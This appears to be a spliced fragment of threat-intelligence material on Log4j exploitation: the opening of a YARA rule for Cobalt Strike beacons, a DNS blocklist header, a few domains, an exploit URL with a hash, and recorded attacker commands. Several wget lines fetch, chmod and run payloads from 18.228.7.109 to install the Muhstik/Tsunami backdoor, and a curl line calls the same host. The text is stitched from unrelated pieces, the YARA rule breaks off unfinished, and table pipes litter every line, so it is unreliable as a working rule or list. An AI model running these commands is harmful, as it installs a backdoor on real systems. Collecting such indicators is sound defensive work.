// Requires the "console" module (available from YARA 4.2.0-rc1 onward)
// Expects already-decoded beacons as input
import "pe" | |
import "console" | |
rule CobaltStrike_Watermark_Profiler: Profiler | |
{ | |
meta: |
############################################################################ | |
# RPZ (DNS Response Policy Zone) to detect internal exploitation of Log4j
############################################################################ | |
# Joint work with @craiu (https://twitter.com/craiu)
# https://github.com/craiu/iocs/blob/main/log4shell/log4j_blocklist.txt | |
############################################################################ | |
dnspod.cn | |
bingsearchlib.com | |
interactsh.com |
45.130.229.168:1389/Exploit.class | |
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b | |
--> curl http://18.228.7.109/.log/log | |
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b | |
--> Downloads the Muhstik/Tsunami backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 & | |
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 & |